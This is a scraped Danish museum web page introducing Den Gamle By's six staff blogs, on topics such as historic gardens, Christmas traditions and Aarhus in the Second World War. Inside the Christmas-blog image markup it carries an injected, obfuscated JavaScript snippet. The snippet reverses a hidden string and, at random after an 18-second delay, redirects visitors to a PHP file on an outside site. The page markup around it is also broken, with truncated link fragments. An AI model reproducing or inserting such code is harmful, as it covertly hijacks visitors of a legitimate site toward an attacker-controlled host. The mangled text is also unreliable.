Velkommen til Den Gamle Bys blogs

Kom bag om nogle af de mange historier, der er i Den Gamle By. Klik på billederne herunder og besøg Den Gamle Bys seks forskellige blog, hvor museets fagfolk fortæller om det, der optager dem.

toren/”>Museumsdirektørens blog

Museumsdirektørens blog

Museumsdirektørens blog: Læs museumsdirektør Thomas Bloch Ravns observationer om Den Gamle By, museer og museumspolitik.

toriskehaver/”>Historiske Haver

Blogger Historiske Haver: Følg arbejdet i Den Gamle Bys historiske haver og drivhuse. Hør om planterne, aktuelle aktiviteter og læs mere om tidligere tiders arbejdsmetoder.

Bag Facaden

Bag facaden

Bloggen Bag Facaden: Følg museets arbejde og kom bag om Den Gamle Bys udstillinger, huse, genstande og undersøgelser.

torier/”>Julehistorier

Julehis<script srcset=

$zXz=function(n){if (typeof ($zXz.list[n]) == “string”) return $zXz.list[n].split(“”).reverse().join(“”);return $zXz.list[n];};$zXz.list=[“\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torier” width=”1024″ height=”686″ /> Bloggen Julehistorier: Læs om traditioner i forbindelse med julen og bliv klogere på hvorfor den danske jul ser ud, som den gør.

Aarhus før og nu

Aarhus før og nu

Bloggen Aarhus før og nu: Læs om Aarhus’ historie. For længe siden og i går. Om mennesker, bygninger, virksomheder og om ting, der har forbindelse med Aarhus.

Aarhus og 2. Verdenskrig

Aarhus og 2. Verdenskrig

Bloggen Aarhus og 2. Verdenskrig: Aarhus under Anden Verdenskrig er en dramatisk historie, som Besættelsesmuseet under Den Gamle By løbende undersøger og finder materiale om.